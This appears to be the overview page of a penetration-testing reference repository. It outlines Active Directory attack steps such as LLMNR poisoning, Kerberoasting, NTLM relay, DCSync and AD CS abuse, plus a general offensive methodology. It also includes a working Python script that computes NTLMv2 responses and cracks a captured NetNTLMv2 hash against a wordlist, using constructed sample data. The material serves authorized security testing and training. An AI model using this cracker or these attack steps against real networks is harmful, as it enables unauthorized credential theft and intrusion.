Practical Penetration Testing References
This repository provides a guideline/methodology for conducting professional penetration tests across environments.
It takes a holistic approach to penetration testing: assessing an organization's security posture by simulating real-world attacks across all aspects of its systems, rather than focusing on individual vulnerabilities in isolation.
Thanks to all of you for your support by buying me a coffee, thank you so much
\o/
-
Active Directory Windows Hosts Attacks
- Reconnaissance Unauthenticated
- Initial Network Enumeration
- Passive Reconnaissance
- Active Host Discovery
- Detect Active Directory Domain
- MITM - LLMNR/NBT-NS Poisoning
- Crack Stolen NTLMv2 Hashes
- Enumeration Unauthenticated
- RID Brute-Force Enumeration
- Brute Forcing
- Username as Password Attack
- Password Spraying
- Authenticated Initial Access
- AD Password Policy
- Vulnerability Scanning
- ESC7 Certificate Authority
- Coercing Authentication
- PetitPotam - Authenticated
- Coercer Tool - Identify Vulnerabilities
- Active Directory Enumeration
- Computer Account Admin
- Users with GenericWrite / GenericAll
- Targeted Kerberoasting attack
- Relay Attacks
- NTLM Relay
- Kerberos
- Convert kirbi to Ccache
- Dump KRBTGT Hash
- Persistence or Lateral
- ESC8 NTLM Relay to AD CS
- Lab CA Configuration
- Check CA for NTLM
- CA Enumeration
- Start NTLM Relay
- Coercing DC
- Stolen Certificate
- Authenticate as DC
- Computer DCSync Attack
- User DCSync Attack
- Certificate Authority Exploit ESC1..ESC16
- Other Relay & MITM References
- IPv6 attacks
- ESC8 NTLM Relay to AD CS
- Reconnaissance Unauthenticated
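The "MITM - LLMNR/NBT-NS Poisoning" and "Crack Stolen NTLMv2 Hashes" steps above end with a captured NetNTLMv2 line in the format Responder and hashcat mode 5600 use: `user::domain:server_challenge:nt_proof:blob`. The following is an added example, not code from this repository: it implements the NTLMv2 computation from MS-NLMP (NT hash = MD4 of the UTF-16LE password; NTLMv2 hash = HMAC-MD5 keyed with the NT hash over UPPERCASE(user)+domain; NTProofStr = HMAC-MD5 keyed with the NTLMv2 hash over server challenge + blob) so a capture can be checked offline against a wordlist or sanity-tested before handing it to hashcat. MD4 is implemented in pure Python because many OpenSSL builds no longer expose it through `hashlib`. The user `jdoe`, domain `CORP`, the challenge, the blob and the sample wordlist are all constructed for the example; a real capture line would come straight from Responder.

```python
"""Offline check of a captured NetNTLMv2 response (hashcat -m 5600 format).

Added example, not part of the original repository. Sample capture data is
constructed inline; in practice the line is copied from Responder output.
"""
import hashlib
import hmac
import struct
from typing import Iterable, Optional, Tuple

_MASK = 0xFFFFFFFF


def _rotl(x: int, n: int) -> int:
    return ((x << n) | (x >> (32 - n))) & _MASK


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4 in pure Python (hashlib's md4 is often disabled)."""
    msg = bytearray(data)
    bit_len = (8 * len(data)) & 0xFFFFFFFFFFFFFFFF
    msg.append(0x80)                      # padding: 0x80, zeros, 64-bit LE length
    while len(msg) % 64 != 56:
        msg.append(0)
    msg += struct.pack("<Q", bit_len)

    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r2_idx = [(i % 4) * 4 + i // 4 for i in range(16)]          # 0,4,8,12,1,5,...
    r3_idx = [0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15]
    for off in range(0, len(msg), 64):
        X = struct.unpack("<16I", msg[off:off + 64])
        a, b, c, d = state
        for i in range(16):                                      # round 1: F
            f = (b & c) | (~b & d)
            a, b, c, d = d, _rotl((a + f + X[i]) & _MASK, (3, 7, 11, 19)[i % 4]), b, c
        for i in range(16):                                      # round 2: G
            g = (b & c) | (b & d) | (c & d)
            a, b, c, d = d, _rotl((a + g + X[r2_idx[i]] + 0x5A827999) & _MASK,
                                  (3, 5, 9, 13)[i % 4]), b, c
        for i in range(16):                                      # round 3: H
            h = b ^ c ^ d
            a, b, c, d = d, _rotl((a + h + X[r3_idx[i]] + 0x6ED9EBA1) & _MASK,
                                  (3, 9, 11, 15)[i % 4]), b, c
        state = [(s + v) & _MASK for s, v in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    """NTOWFv1: MD4 over the UTF-16LE password (what DCSync/SAM dumps show)."""
    return md4(password.encode("utf-16le"))


def ntlmv2_hash(password: str, user: str, domain: str) -> bytes:
    """NTOWFv2: HMAC-MD5 keyed with the NT hash over UPPERCASE(user) + domain."""
    ident = (user.upper() + domain).encode("utf-16le")
    return hmac.new(nt_hash(password), ident, hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 keyed with NTOWFv2 over server challenge + client blob."""
    return hmac.new(ntlmv2_hash(password, user, domain), challenge + blob, hashlib.md5).digest()


def parse_5600(line: str) -> Tuple[str, str, bytes, bytes, bytes]:
    """Split user::domain:challenge:proof:blob into its typed parts."""
    user, _, domain, chal, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chal), bytes.fromhex(proof), bytes.fromhex(blob)


def crack_5600(line: str, wordlist: Iterable[str]) -> Optional[str]:
    """Return the first candidate whose NTProofStr matches the capture, else None."""
    user, domain, chal, proof, blob = parse_5600(line)
    for candidate in wordlist:
        if hmac.compare_digest(nt_proof(candidate, user, domain, chal, blob), proof):
            return candidate
    return None


# Constructed sample capture (NOT a real network capture): a well-formed NTLMv2
# client blob with one AV_PAIR (MsvAvNbDomainName = "CORP") and the challenge
# 1122334455667788, signed with the password "Winter2024!".
_SAMPLE_CHALLENGE = bytes.fromhex("1122334455667788")
_SAMPLE_BLOB = bytes.fromhex(
    "0101000000000000"                  # RespType=1, HiRespType=1, reserved
    "00d0a2c1e0b9da01"                  # timestamp (constructed)
    "a1b2c3d4e5f60718"                  # client challenge (constructed)
    "00000000"                          # reserved
    "0200080043004f0052005000"          # AV_PAIR NbDomainName="CORP"
    "00000000"                          # AV_PAIR MsvAvEOL
    "00000000"                          # trailing reserved
)


def build_sample_capture(password: str, user: str = "jdoe", domain: str = "CORP") -> str:
    """Emit a hashcat 5600 line for the constructed scenario (for the demo only)."""
    proof = nt_proof(password, user, domain, _SAMPLE_CHALLENGE, _SAMPLE_BLOB)
    return f"{user}::{domain}:{_SAMPLE_CHALLENGE.hex()}:{proof.hex()}:{_SAMPLE_BLOB.hex()}"


SAMPLE_LINE = build_sample_capture("Winter2024!")
SAMPLE_WORDLIST = ["Password1", "Summer2024!", "Winter2024!"]

if __name__ == "__main__":
    print("capture :", SAMPLE_LINE)
    print("cracked :", crack_5600(SAMPLE_LINE, SAMPLE_WORDLIST))
```

Two practical points follow from the construction. The NTLMv2 hash is salted with the username and domain, so a NetNTLMv2 capture cannot be passed the hash or looked up in a precomputed NT-hash table; it has to be cracked per user, which is why spraying weak seasonal passwords against the capture is usually the realistic path. And because the NTProofStr is an HMAC over data the attacker observed (challenge and blob), verifying a candidate is cheap, which is also why the same capture fed to `hashcat -m 5600` runs fast.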
-
Penetration Testing Methodology - Holistic Approach
- Reconnaissance
- Enumeration
- Research
- Exploitation
- Hosting
- File transfer
- Shells & Payloads
- Cracking
- Exploits
- Metasploit
- Code Reverse Engineering
- Post-Exploitation
- Microsoft Windows / AD
- Linux
- APIs & Web Applications
- OWASP Web Application Testing
- OWASP Large Language Model Apps
- Attacking Systems
- Active Directory
- Email / SMTP / Microsoft Exchange / Outlook Web Access
- Printers
- DNS
- Oracle
- Wireless
- OT, SCADA, PLC & EWS
- Reporting
- Foundation Skills
- PenTest Practice Learning Platforms
- Knowledge-Base
✅ Offensive engagement lifecycle, scoping, rules of engagement, reporting and remediation.
✅ Includes checks and recommended tools for enumeration, exploitation, privilege escalation, and persistence.
✅ Continuously updated to reflect the shifting landscape: new assessments, emerging threats, and evolving best practices.
- MITRE ATT&CK
- OWASP Application Security Verification Standard - ASVS
- OWASP Artificial Intelligence Security Verification Standard AISVS - LLM
- NIST Cybersecurity Framework
Tools are only as powerful as the hands that use them.
Tools can reveal a crack in our armor.
Our job is to find and seal the cracks in the armor.
Best hackers think like attackers, but act as protectors.
Stay curious, stay ethical, and keep learning.
